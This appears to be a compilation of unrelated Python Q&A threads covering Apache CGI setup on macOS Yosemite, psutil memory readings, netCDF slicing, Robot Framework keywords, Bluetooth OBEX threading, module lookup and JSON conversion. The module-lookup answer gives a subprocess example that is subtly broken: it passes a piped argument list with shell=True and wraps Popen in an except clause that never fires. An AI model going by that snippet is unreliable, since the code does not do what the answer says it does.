How to let CGI scripts work on MacOS 10.10 Yosemite Question: I followed this [instuctions](http://coolestguidesontheplanet.com/get-apache- mysql-php-phpmyadmin-working-osx-10-10-yosemite/) to set up Apache on MacOS 10.10 Yosemite. Now I want to let CGI scripts work on it, but something goes wrong. At the URL `http://localhost/~daniele/cgi-bin/provola.py`, the browser (Safari) just shows me the python code of my cgi script, that means the server does not execute it. In details, here are my configurations files: * /etc/apache2/httpd.config # This is the main Apache HTTP server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.4/> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.4/mod/directives.html> # for a discussion of each configuration directive. # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "logs/access_log" # with ServerRoot set to "/usr/local/apache2" will be interpreted by the # server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log" # will be interpreted as '/logs/access_log'. # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # Do not add a slash at the end of the directory path. If you point # ServerRoot at a non-local disk, be sure to specify a local disk on the # Mutex directive, if file-based mutexes are used. If you wish to share the # same ServerRoot for multiple httpd daemons, you will need to change at # least PidFile. # ServerRoot "/usr" # # Mutex: Allows you to set the mutex mechanism and mutex file directory # for individual mutexes, or change the global defaults # # Uncomment and change the directory if mutexes are file-based and the default # mutex file directory is not on a local disk or is not appropriate for some # other reason. # # Mutex default:/private/var/run # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, instead of the default. See also the <VirtualHost> # directive. # # Change this to Listen on specific IP addresses as shown below to # prevent Apache from glomming onto all bound IP addresses. # #Listen 12.34.56.78:80 Listen 80 # # Dynamic Shared Object (DSO) Support # # To be able to use the functionality of a module which was built as a DSO you # have to place corresponding `LoadModule' lines at this location so the # directives contained in it are actually available _before_ they are used. # Statically compiled modules (those listed by `httpd -l') do not need # to be loaded here. 
# # Example: # LoadModule foo_module modules/mod_foo.so # LoadModule authn_file_module libexec/apache2/mod_authn_file.so #LoadModule authn_dbm_module libexec/apache2/mod_authn_dbm.so #LoadModule authn_anon_module libexec/apache2/mod_authn_anon.so #LoadModule authn_dbd_module libexec/apache2/mod_authn_dbd.so #LoadModule authn_socache_module libexec/apache2/mod_authn_socache.so LoadModule authn_core_module libexec/apache2/mod_authn_core.so LoadModule authz_host_module libexec/apache2/mod_authz_host.so LoadModule authz_groupfile_module libexec/apache2/mod_authz_groupfile.so LoadModule authz_user_module libexec/apache2/mod_authz_user.so #LoadModule authz_dbm_module libexec/apache2/mod_authz_dbm.so #LoadModule authz_owner_module libexec/apache2/mod_authz_owner.so #LoadModule authz_dbd_module libexec/apache2/mod_authz_dbd.so LoadModule authz_core_module libexec/apache2/mod_authz_core.so #LoadModule authnz_ldap_module libexec/apache2/mod_authnz_ldap.so LoadModule access_compat_module libexec/apache2/mod_access_compat.so LoadModule auth_basic_module libexec/apache2/mod_auth_basic.so #LoadModule auth_form_module libexec/apache2/mod_auth_form.so #LoadModule auth_digest_module libexec/apache2/mod_auth_digest.so #LoadModule allowmethods_module libexec/apache2/mod_allowmethods.so #LoadModule file_cache_module libexec/apache2/mod_file_cache.so #LoadModule cache_module libexec/apache2/mod_cache.so #LoadModule cache_disk_module libexec/apache2/mod_cache_disk.so #LoadModule cache_socache_module libexec/apache2/mod_cache_socache.so #LoadModule socache_shmcb_module libexec/apache2/mod_socache_shmcb.so #LoadModule socache_dbm_module libexec/apache2/mod_socache_dbm.so #LoadModule socache_memcache_module libexec/apache2/mod_socache_memcache.so #LoadModule watchdog_module libexec/apache2/mod_watchdog.so #LoadModule macro_module libexec/apache2/mod_macro.so #LoadModule dbd_module libexec/apache2/mod_dbd.so #LoadModule dumpio_module libexec/apache2/mod_dumpio.so #LoadModule echo_module libexec/apache2/mod_echo.so #LoadModule buffer_module libexec/apache2/mod_buffer.so #LoadModule data_module libexec/apache2/mod_data.so #LoadModule ratelimit_module libexec/apache2/mod_ratelimit.so LoadModule reqtimeout_module libexec/apache2/mod_reqtimeout.so #LoadModule ext_filter_module libexec/apache2/mod_ext_filter.so #LoadModule request_module libexec/apache2/mod_request.so #LoadModule include_module libexec/apache2/mod_include.so LoadModule filter_module libexec/apache2/mod_filter.so #LoadModule reflector_module libexec/apache2/mod_reflector.so #LoadModule substitute_module libexec/apache2/mod_substitute.so #LoadModule sed_module libexec/apache2/mod_sed.so #LoadModule charset_lite_module libexec/apache2/mod_charset_lite.so #LoadModule deflate_module libexec/apache2/mod_deflate.so #LoadModule xml2enc_module libexec/apache2/mod_xml2enc.so #LoadModule proxy_html_module libexec/apache2/mod_proxy_html.so LoadModule mime_module libexec/apache2/mod_mime.so #LoadModule ldap_module libexec/apache2/mod_ldap.so LoadModule log_config_module libexec/apache2/mod_log_config.so #LoadModule log_debug_module libexec/apache2/mod_log_debug.so #LoadModule log_forensic_module libexec/apache2/mod_log_forensic.so #LoadModule logio_module libexec/apache2/mod_logio.so LoadModule env_module libexec/apache2/mod_env.so #LoadModule mime_magic_module libexec/apache2/mod_mime_magic.so #LoadModule expires_module libexec/apache2/mod_expires.so LoadModule headers_module libexec/apache2/mod_headers.so #LoadModule usertrack_module 
libexec/apache2/mod_usertrack.so ##LoadModule unique_id_module libexec/apache2/mod_unique_id.so LoadModule setenvif_module libexec/apache2/mod_setenvif.so LoadModule version_module libexec/apache2/mod_version.so #LoadModule remoteip_module libexec/apache2/mod_remoteip.so LoadModule proxy_module libexec/apache2/mod_proxy.so LoadModule proxy_connect_module libexec/apache2/mod_proxy_connect.so LoadModule proxy_ftp_module libexec/apache2/mod_proxy_ftp.so LoadModule proxy_http_module libexec/apache2/mod_proxy_http.so LoadModule proxy_fcgi_module libexec/apache2/mod_proxy_fcgi.so LoadModule proxy_scgi_module libexec/apache2/mod_proxy_scgi.so #LoadModule proxy_fdpass_module libexec/apache2/mod_proxy_fdpass.so LoadModule proxy_wstunnel_module libexec/apache2/mod_proxy_wstunnel.so LoadModule proxy_ajp_module libexec/apache2/mod_proxy_ajp.so LoadModule proxy_balancer_module libexec/apache2/mod_proxy_balancer.so LoadModule proxy_express_module libexec/apache2/mod_proxy_express.so #LoadModule session_module libexec/apache2/mod_session.so #LoadModule session_cookie_module libexec/apache2/mod_session_cookie.so #LoadModule session_dbd_module libexec/apache2/mod_session_dbd.so LoadModule slotmem_shm_module libexec/apache2/mod_slotmem_shm.so #LoadModule slotmem_plain_module libexec/apache2/mod_slotmem_plain.so #LoadModule ssl_module libexec/apache2/mod_ssl.so #LoadModule dialup_module libexec/apache2/mod_dialup.so LoadModule lbmethod_byrequests_module libexec/apache2/mod_lbmethod_byrequests.so LoadModule lbmethod_bytraffic_module libexec/apache2/mod_lbmethod_bytraffic.so LoadModule lbmethod_bybusyness_module libexec/apache2/mod_lbmethod_bybusyness.so #LoadModule lbmethod_heartbeat_module libexec/apache2/mod_lbmethod_heartbeat.so LoadModule unixd_module libexec/apache2/mod_unixd.so #LoadModule heartbeat_module libexec/apache2/mod_heartbeat.so #LoadModule heartmonitor_module libexec/apache2/mod_heartmonitor.so #LoadModule dav_module libexec/apache2/mod_dav.so LoadModule status_module libexec/apache2/mod_status.so LoadModule autoindex_module libexec/apache2/mod_autoindex.so #LoadModule asis_module libexec/apache2/mod_asis.so #LoadModule info_module libexec/apache2/mod_info.so #LoadModule cgi_module libexec/apache2/mod_cgi.so #LoadModule dav_fs_module libexec/apache2/mod_dav_fs.so #LoadModule dav_lock_module libexec/apache2/mod_dav_lock.so #LoadModule vhost_alias_module libexec/apache2/mod_vhost_alias.so LoadModule negotiation_module libexec/apache2/mod_negotiation.so LoadModule dir_module libexec/apache2/mod_dir.so #LoadModule imagemap_module libexec/apache2/mod_imagemap.so #LoadModule actions_module libexec/apache2/mod_actions.so #LoadModule speling_module libexec/apache2/mod_speling.so LoadModule userdir_module libexec/apache2/mod_userdir.so LoadModule alias_module libexec/apache2/mod_alias.so #LoadModule rewrite_module libexec/apache2/mod_rewrite.so #LoadModule php5_module libexec/apache2/libphp5.so #LoadModule hfs_apple_module libexec/apache2/mod_hfs_apple.so <IfModule unixd_module> # # If you wish httpd to run as a different user or group, you must run # httpd as root initially and it will switch. # # User/Group: The name (or #number) of the user/group to run httpd as. # It is usually good practice to create a dedicated user and group for # running httpd, as with most system services. 
# User _www Group _www </IfModule> # 'Main' server configuration # # The directives in this section set up the values used by the 'main' # server, which responds to any requests that aren't handled by a # <VirtualHost> definition. These values also provide defaults for # any <VirtualHost> containers you may define later in the file. # # All of these directives may appear inside <VirtualHost> containers, # in which case these default settings will be overridden for the # virtual host being defined. # # # ServerAdmin: Your address, where problems with the server should be # e-mailed. This address appears on some server-generated pages, such # as error documents. e.g. [email protected] # ServerAdmin [email protected] # # ServerName gives the name and port that the server uses to identify itself. # This can often be determined automatically, but we recommend you specify # it explicitly to prevent problems during startup. # # If your host doesn't have a registered DNS name, enter its IP address here. # ServerName 127.0.0.1 # # Deny access to the entirety of your server's filesystem. You must # explicitly permit access to web content directories in other # <Directory> blocks below. # <Directory /> AllowOverride none Require all denied </Directory> # # Note that from this point forward you must specifically allow # particular features to be enabled - so if something's not working as # you might expect, make sure that you have specifically enabled it # below. # # # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/Library/WebServer/Documents" <Directory "/Library/WebServer/Documents"> # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both complicated and important. Please see # http://httpd.apache.org/docs/2.4/mod/core.html#options # for more information. # Options FollowSymLinks Multiviews MultiviewsMatch Any # # AllowOverride controls what directives may be placed in .htaccess files. # It can be "All", "None", or any combination of the keywords: # AllowOverride FileInfo AuthConfig Limit # AllowOverride None # # Controls who can get stuff from this server. # Require all granted </Directory> # # DirectoryIndex: sets the file that Apache will serve if a directory # is requested. # <IfModule dir_module> DirectoryIndex index.html </IfModule> # # The following lines prevent .htaccess and .htpasswd files from being # viewed by Web clients. # <FilesMatch "^\.([Hh][Tt]|[Dd][Ss]_[Ss])"> Require all denied </FilesMatch> # # Apple specific filesystem protection. # <Files "rsrc"> Require all denied </Files> <DirectoryMatch ".*\.\.namedfork"> Require all denied </DirectoryMatch> # # ErrorLog: The location of the error log file. # If you do not specify an ErrorLog directive within a <VirtualHost> # container, error messages relating to that virtual host will be # logged here. If you *do* define an error logfile for a <VirtualHost> # container, that host's errors will be logged there and not here. # ErrorLog "/private/var/log/apache2/error_log" # # LogLevel: Control the number of messages logged to the error_log. # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. 
# LogLevel warn <IfModule log_config_module> # # The following directives define some format nicknames for use with # a CustomLog directive (see below). # LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common <IfModule logio_module> # You need to enable mod_logio.c to use %I and %O LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio </IfModule> # # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # CustomLog "/private/var/log/apache2/access_log" common # # If you prefer a logfile with access, agent, and referer information # (Combined Logfile Format) you can use the following directive. # #CustomLog "/private/var/log/apache2/access_log" combined </IfModule> <IfModule alias_module> # # Redirect: Allows you to tell clients about documents that used to # exist in your server's namespace, but do not anymore. The client # will make a new request for the document at its new location. # Example: # Redirect permanent /foo http://www.example.com/bar # # Alias: Maps web paths into filesystem paths and is used to # access content that does not live under the DocumentRoot. # Example: # Alias /webpath /full/filesystem/path # # If you include a trailing / on /webpath then the server will # require it to be present in the URL. You will also likely # need to provide a <Directory> section to allow access to # the filesystem path. # # ScriptAlias: This controls which directories contain server scripts. # ScriptAliases are essentially the same as Aliases, except that # documents in the target directory are treated as applications and # run by the server when requested rather than as documents sent to the # client. The same rules about trailing "/" apply to ScriptAlias # directives as to Alias. # #ScriptAliasMatch ^/cgi-bin/((?!(?i:webobjects)).*$) "/Library/WebServer/CGI-Executables/$1" #ScriptAlias /cgi-bin/ "/Users/daniele/Sites/cgi-bin/" </IfModule> <IfModule cgid_module> # # ScriptSock: On threaded servers, designate the path to the UNIX # socket used to communicate with the CGI daemon of mod_cgid. # #Scriptsock cgisock </IfModule> # # "/Library/WebServer/CGI-Executables" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/Library/WebServer/CGI-Executables"> AllowOverride None Options None Require all granted </Directory> #<Directory "/Users/daniele/Sites/cgi-bin/"> # AllowOverride None # Options ExecCGI # AddHandler cgi-script .cgi .pl .tcl # Order allow,deny # Allow from all #</Directory> <IfModule mime_module> # # TypesConfig points to the file containing the list of mappings from # filename extension to MIME-type. # TypesConfig /private/etc/apache2/mime.types # # AddType allows you to add to or override the MIME configuration # file specified in TypesConfig for specific file types. # #AddType application/x-gzip .tgz # # AddEncoding allows you to have certain browsers uncompress # information on the fly. Note: Not all browsers support this. 
# #AddEncoding x-compress .Z #AddEncoding x-gzip .gz .tgz # # If the AddEncoding directives above are commented-out, then you # probably should define those extensions to indicate media types: # AddType application/x-compress .Z AddType application/x-gzip .gz .tgz # # AddHandler allows you to map certain file extensions to "handlers": # actions unrelated to filetype. These can be either built into the server # or added with the Action directive (see below) # # To use CGI scripts outside of ScriptAliased directories: # (You will also need to add "ExecCGI" to the "Options" directive.) # #AddHandler cgi-script .cgi # For type maps (negotiated resources): #AddHandler type-map var # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # #AddType text/html .shtml #AddOutputFilter INCLUDES .shtml </IfModule> # # The mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type. The MIMEMagicFile # directive tells the module where the hint definitions are located. # #MIMEMagicFile /private/etc/apache2/magic # # Customizable error responses come in three flavors: # 1) plain text 2) local redirects 3) external redirects # # Some examples: #ErrorDocument 500 "The server made a boo boo." #ErrorDocument 404 /missing.html #ErrorDocument 404 "/cgi-bin/missing_handler.pl" #ErrorDocument 402 http://www.example.com/subscription_info.html # # # MaxRanges: Maximum number of Ranges in a request before # returning the entire resource, or one of the special # values 'default', 'none' or 'unlimited'. # Default setting is to accept 200 Ranges. #MaxRanges unlimited # # EnableMMAP and EnableSendfile: On systems that support it, # memory-mapping or the sendfile syscall may be used to deliver # files. This usually improves server performance, but must # be turned off when serving from networked-mounted # filesystems or if support for these functions is otherwise # broken on your system. # Defaults: EnableMMAP On, EnableSendfile Off # #EnableMMAP off #EnableSendfile on TraceEnable off # Supplemental configuration # # The configuration files in the /private/etc/apache2/extra/ directory can be # included to add extra features or to modify the default configuration of # the server, or you may simply copy their contents here and change as # necessary. 
# Server-pool management (MPM specific) Include /private/etc/apache2/extra/httpd-mpm.conf # Multi-language error messages #Include /private/etc/apache2/extra/httpd-multilang-errordoc.conf # Fancy directory listings Include /private/etc/apache2/extra/httpd-autoindex.conf # Language settings #Include /private/etc/apache2/extra/httpd-languages.conf # User home directories Include /private/etc/apache2/extra/httpd-userdir.conf # Real-time info on requests and configuration #Include /private/etc/apache2/extra/httpd-info.conf # Virtual hosts #Include /private/etc/apache2/extra/httpd-vhosts.conf # Local access to the Apache HTTP Server Manual #Include /private/etc/apache2/extra/httpd-manual.conf # Distributed authoring and versioning (WebDAV) #Include /private/etc/apache2/extra/httpd-dav.conf # Various default settings #Include /private/etc/apache2/extra/httpd-default.conf # Configure mod_proxy_html to understand HTML4/XHTML1 <IfModule proxy_html_module> Include /private/etc/apache2/extra/proxy-html.conf </IfModule> # Secure (SSL/TLS) connections #Include /private/etc/apache2/extra/httpd-ssl.conf # # Note: The following must must be present to support # starting without SSL on platforms with no /dev/random equivalent # but a statically compiled-in mod_ssl. # <IfModule ssl_module> SSLRandomSeed startup builtin SSLRandomSeed connect builtin </IfModule> Include /private/etc/apache2/other/*.conf # # uncomment out the below to deal with user agents that deliberately # violate open standards by misusing DNT (DNT *must* be a specific # end-user choice) # #<IfModule setenvif_module> #BrowserMatch "MSIE 10.0;" bad_DNT #</IfModule> #<IfModule headers_module> #RequestHeader unset DNT env=bad_DNT #</IfModule> * /etc/apache2/users/daniele.conf ScriptAlias /cgi-bin/ "/Users/daniele/Sites/cgi-bin/" <Directory "/Users/daniele/Sites/cgi-bin/"> AllowOverride None Options ExecCGI AddHandler cgi-script .cgi .pl .tcl Order allow,deny Allow from all </Directory> <Directory "/Users/daniele/Sites/"> AllowOverride All Options Indexes MultiViews FollowSymLinks Require all granted </Directory> * /etc/apache2/extra/httpd-userdir.conf # Settings for user home directories # # Required module: mod_authz_core, mod_authz_host, mod_userdir # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. Note that you must also set # the default access control for these directories, as in the example below. # UserDir Sites # # Control access to UserDir directories. The following is an example # for a site where these directories are restricted to read-only. # Include /private/etc/apache2/users/*.conf <IfModule bonjour_module> RegisterUserSite customized-users </IfModule> These are the simple html and python code I'm trying to execute: * /Users/daniele/Sites/prova_cgi.html <HTML> <HEAD> <TITLE>PROVOLA</TITLE> </HEAD> <BODY> <form action="cgi-bin/provola.py" method="POST"> <fieldset> <legend>Personal information:</legend> First name:<br> <input type="text" name="firstname" value="Mickey"><br> Last name:<br> <input type="text" name="lastname" value="Mouse"> <br><br> <input type="submit" value="Submit"></fieldset> </form> </BODY> </HTML> * /Users/daniele/Sites/cgi-bin/provola.py #!/usr/bin/python def main(): print "Content-type: text/html" print print "<html><head>" print "" print "</head><body>" print "Test Page" print "</body></html>" return 0 if __name__ == '__main__': main() Any tips? Thanks in advance. 
Answer: Try:

    <Directory "/Users/daniele/Sites/cgi-bin/">
        AllowOverride None
        Options ExecCGI
        AddHandler cgi-script .cgi .pl .tcl .py
        Order allow,deny
        Allow from all
    </Directory>

Mind the `.py` I added with respect to your quoted setup. The `AddHandler` directive tells Apache which files to treat as scripts rather than as plain content, and in your current setup Python scripts are missing from that list. Also check that the CGI module is actually loaded: in the `httpd.conf` you posted, the `LoadModule cgi_module libexec/apache2/mod_cgi.so` line is commented out (`mod_cgid` is the equivalent for threaded MPMs), and without it Apache will keep serving the script source as text. See: <https://httpd.apache.org/docs/current/howto/cgi.html>
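Once the script is actually being executed, the form fields posted by `prova_cgi.html` can be read with the standard `cgi` module. Here is a minimal sketch of `provola.py` in that direction (Python 2, matching the script in the question; the field names come from the question's HTML form):

    #!/usr/bin/python
    import cgi

    def main():
        form = cgi.FieldStorage()                          # parses the POSTed form data
        first = cgi.escape(form.getfirst("firstname", ""))
        last = cgi.escape(form.getfirst("lastname", ""))
        print "Content-type: text/html"
        print
        print "<html><body>"
        print "Hello, %s %s" % (first, last)
        print "</body></html>"

    if __name__ == '__main__':
        main()

The script also needs to be executable (`chmod +x provola.py`) for Apache to run it.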
Memory usage of a single process with psutil in python (in byte) Question: How to get the amount of memory which has been used by a single process in windows platform with psutil library? (I dont want to have the percentage , I want to know the amount in bytes) We can use: psutil.virtual_memory().used To find the memory usage of the whole OS in bytes, but how about each single process? Thanks, Answer: Call [`memory_info_ex`](https://pythonhosted.org/psutil/#psutil.Process.memory_info_ex): >>> import psutil >>> p = psutil.Process() >>> p.name() 'python.exe' >>> _ = p.memory_info_ex() >>> _.wset, _.pagefile (11665408, 8499200) The [working set](http://msdn.microsoft.com/en- us/library/windows/desktop/cc441804%28v=vs.85%29.aspx) includes pages that are shared or shareable by other processes, so in the above example it's actually larger than the paging file commit charge. There's also a simpler `memory_info` method. This returns `rss` and `vms`, which correspond to `wset` and `pagefile`. >>> p.memory_info() pmem(rss=11767808, vms=8589312) * * * For another example, let's map some shared memory. >>> import mmap >>> m = mmap.mmap(-1, 10000000) >>> p.memory_info() pmem(rss=11792384, vms=8609792) The mapped pages get demand-zero faulted into the working set. >>> for i in range(0, len(m), 4096): m[i] = 0xaa ... >>> p.memory_info() pmem(rss=21807104, vms=8581120) A private copy incurs a paging file commit charge: >>> s = m[:] >>> p.memory_info() pmem(rss=31830016, vms=18604032)
Python, how to slice a netcdf file. Question: I am trying to slice a variable from a netcdf file and plot it, but I am running into problems. This is from my code:

    import numpy as np
    from netCDF4 import Dataset

    Raw = "filename.nc"
    data = Dataset(Raw)
    u = data.variables['u'][:,:,:,:]
    print u.shape
    U = u([0,0,[200:500],[1:300]])
    # The print statement yields (2, 17, 900, 2600) as u's dimensions.
    # U is the slice of the dataset I am interested in: a small subset of the 4-dimensional vector.

This last line of code gives me a syntax error and I cannot figure out why. Trying to pick out a single value from the array (u(0,0,0,1)) gives me a type error: TypeError: 'MaskedArray' The program's aim is to perform simple algebra on a subset of this subset and to plot this data. Any help is appreciated. Answer: I think the comment by Spencer Hill is correct. Without seeing the full error message, I can't be sure, but I'm pretty sure that the `TypeError` results from you (through the use of parentheses) trying to call the array as a function. Try:

    U = u[0, 0, 200:500, 1:300]
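If the eventual goal is to plot that subset, a minimal sketch could look like the following; the file name and variable name are the ones from the question, and the use of `matplotlib` is an assumption since the question does not say which plotting library is intended.

    import matplotlib.pyplot as plt
    from netCDF4 import Dataset

    data = Dataset("filename.nc")
    U = data.variables['u'][0, 0, 200:500, 1:300]   # plain indexing, no parentheses

    plt.imshow(U, origin='lower')                   # the slice is 2-D, so show it as an image
    plt.colorbar()
    plt.show()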
execute robot keyword from python using robotframework api Question: Writing complex robot keywords in robot language is sometimes very time consuming because robot language is not a real programming language. I would like to write my keywords in python and only expose simple html tables in robotframework language. The problem is that we already have a lot of low level robot keywords written in robot language (in .robot and .txt files). Is it possible to execute those keywords from the python code using the robotframework python api ? Answer: Yes, it is possible. In your python code you can get a reference to the BuiltIn library, and then use the Run Keyword keyword to run any keyword you want. For example, you could write a python keyword that takes another keyword as an argument and runs it. The following might be how you do it in python: # MyLibrary.py from robot.libraries.BuiltIn import BuiltIn def call_keyword(keyword): return BuiltIn().run_keyword(keyword) You can then tell this keyword to call any other keyword. Here's an example suite that has a keyword written in robot,, and then has the python code execute it: *** Settings *** | Library | MyLibrary.py *** Keywords *** | Example keyword | | log | hello, world *** Test Cases *** | Example of calling a python keyword that calls a robot keyword | | Call keyword | Example keyword Notice how the test case tells the `call_keyword` method to run the keyword `Example Keyword`. Of course, you don't _have_ to pass in a keyword. The key point is to get a reference to the BuiltIn library, which then allows you to call any method in that library. This is documented in the robot framework user guide, in the section titled [Using Robot Framework's Internal Modules](http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#using- robot-framework-s-internal-modules). More specifically, see the section [Using BuiltIn Library](http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#using- builtin-library). Note that the documentation states you need to call register_run_keyword if your keyword calls the `run_keyword` method. I won't reproduce the documentation here. You can get the documentation by looking in the BuiltIn module itself, or run the following code in an interactive python session: >>> import robot.libraries.BuiltIn >>> help(robot.libraries.BuiltIn.register_run_keyword)
send a file to multiple device at same time via python&bluez Question: i want send a file to multiple device at same time via python ... my code : import bluetooth from lightblue import * import select import threading def send(fileaddress,bladdress,pushport): client = obex.OBEXClient(bladdress, pushport) client.connect() client.put({"name": "test"}, open(fileaddress)) def StartSend(fileaddress,bladdress,pushport): t=threading.Thread(group=None,target=send, name=None, args=(fileaddress,bladdress,pushport)) t.daemon=True t.start() t.join() class MyDiscoverer(bluetooth.DeviceDiscoverer): def pre_inquiry(self): self.done = False def device_discovered(self, addr, device_class, name): print "%s - %s" % (addr, name) serv = bluetooth.find_service(name="OBEX Object Push", uuid=None, address=None) pushport = serv[0]['port'] StartSend('/home/abbas/Desktop/eclipse-standard-kepler-SR2-linux-gtk.tar.gz', addr, pushport) def inquiry_complete(self): self.done = True if __name__ == '__main__': d = MyDiscoverer() d.find_devices(lookup_names = True) readfiles = [ d, ] while True: rfds = select.select( readfiles, [], [] )[0] if d in rfds: d.process_event() if d.done: break but when first device detect and start send file to it all python script paused and wait that sending finish and next start to send another device ... why ? i use thread so why pause python process in send step ? i use this site for these code : <http://people.csail.mit.edu/albert/bluez- intro/x339.html> To asynchronously detect nearby bluetooth devices, create a subclass of DeviceDiscoverer and override the pre_inquiry, device_discovered, and inquiry_complete methods. To start the discovery process, invoke find_devices, which returns immediately. pre_inquiry is called immediately before the actual inquiry process begins, and inquiry_complete is called as soon as the process completes. MyDiscoverer exposes a fileno method, which allows it to be used with the select module. This provides a way for a single thread of control to wait for events on many open files at once, and greatly simplifies event-driven programs. Call process_event to have the DeviceDiscoverer process pending events, which can be either a discovered device or the inquiry completion. When a nearby device is detected, device_discovered is invoked, with the address and device class of the detected device. If lookup_names was set in the call to find_devices, then name will also be set to the user-friendly name of the device. For more information about device classes Answer: The problem is that the `StartSend` function joins the thread, which waits for the thread to finish. So, creating the thread was pointless. Try using `multiprocessing.ThreadPool` instead. Its not well documented but works the same as `multiprocessing.Pool`.
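A minimal sketch of that fix, keeping the question's `send` function (passed in here as `send_func`) but starting all transfers before waiting on any of them; the target list is a placeholder:

    import threading

    def start_transfers(send_func, fileaddress, targets):
        """Start one sending thread per (bladdress, pushport) pair, then wait for all of them."""
        workers = []
        for bladdress, pushport in targets:
            t = threading.Thread(target=send_func,
                                 args=(fileaddress, bladdress, pushport))
            t.daemon = True
            t.start()            # every transfer begins before we wait on any of them
            workers.append(t)
        for t in workers:
            t.join()             # block only after all threads are running

If you do prefer a pool, note that the class actually lives at `multiprocessing.pool.ThreadPool`.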
import a python module whose location is unknown Question: I would like to import a function (function.py) from a given module in python (MOD.py), whose location I do not know. For it, I have performed two steps: First step, I get the path to the directory that contains the module:

    path = subprocess.check_output(['find', 'home/scripts','-iname','MOD.py','|','sed','s/\/MOD.py//g']).rstrip()

Secondly, I point at this directory to get the function from the module:

    sys.path.insert(0,'{0}'.format(path))
    from MOD import function

The code written is failing in the first step, particularly in the sed. Why is it not working? Is there a clearer way to do the first step? Is it necessary to do two steps, or is it possible to do it with one python instruction? Thanks! Answer: First, note that you cannot use a pipe like that! To use a pipe you have to pass `shell=True`, so instead of `check_output` use `Popen`. Your code also fails in the `path` argument of `find`: add a `/` before home. If the executed command returns a nonzero exit code, an exception is raised, so you can use a `try`-`except` with `subprocess.CalledProcessError` to catch errors and get the output along with the exit code:

    import subprocess
    try:
        ps = subprocess.Popen(['find', '/home/scripts','-iname','MOD.py','|','sed','s/\/MOD.py//g'],shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
        path= ps.communicate()[0]
    except subprocess.CalledProcessError as e:
        out_bytes = e.output
        code= e.returncode

In addition, as a more secure method, I suggest you don't use `shell=True` and instead use two commands:

    ps = subprocess.Popen(['find', '/home/scripts','-iname','MOD.py'], stdout=subprocess.PIPE)
    path = subprocess.check_output(['sed','s/\/MOD.py//g'], stdin=ps.stdout)
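As for the question about a clearer way to do the first step: a pure-Python alternative avoids the shell entirely. A minimal sketch, reusing the question's search root and module name:

    import os
    import sys

    def find_module_dir(root, filename='MOD.py'):
        """Walk the tree under root and return the first directory containing filename."""
        for dirpath, dirnames, filenames in os.walk(root):
            if filename in filenames:
                return dirpath
        return None

    path = find_module_dir('/home/scripts')
    if path is not None:
        sys.path.insert(0, path)
        from MOD import function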
Convert following data to JSON format in python Question: I have a file with following content which is generated by some other program. Please note that each one has a new line character at the end. {'a':1,'b':534} {'a':4,'b':882} {'a':2,'b':964} . . so on... How do I convert this into valid JSON format? The above should be printed something like this { "Sale": [ { "a": 1, "b": 534 }, { "a": 4, "b": 882 }, { "a": 2, "b": 964 } ] } I can do it in JQuery but I need to do this in python as i am not good at python but i need to make it runnable through bash script hence the need to make it to a python script. I am gonna share the jquery solution just in case you need to refer. result = replaceAll(result,"'","\""); result = replaceAll(result,"}, {",","); result = replaceAll(result,"}{","},{"); result = replaceAll(result,"}\n{","},{"); result = "{\"Sale\":["+result+"]}"; //alert(result); replaceAll function is function replaceAll(str, find, replace) { var i = str.indexOf(find); if (i > -1){ str = str.replace(find, replace); i = i + replace.length; var st2 = str.substring(i); if(st2.indexOf(find) > -1){ str = str.substring(0,i) + replaceAll(st2, find, replace); } } return str; } The above works but i need a python alternative to this. Answer: from ast import literal_eval with open('data.txt') as f: sale = [literal_eval(line) for line in f] data = {'Sale': sale} print(data) Output {'Sale': [{'a': 1, 'b': 534}, {'a': 4, 'b': 882}, {'a': 2, 'b': 964}]} From there, you can use the [`json` library](https://docs.python.org/2/library/json.html) to write this to file in JSON format. import json json.dumps(data, indent=4)
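As a short follow-up to that last step, where `data` is the dict built above and `final.json` is just an example filename, writing the nested layout shown in the question looks like:

    import json

    with open('final.json', 'w') as out:
        json.dump(data, out, indent=4)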
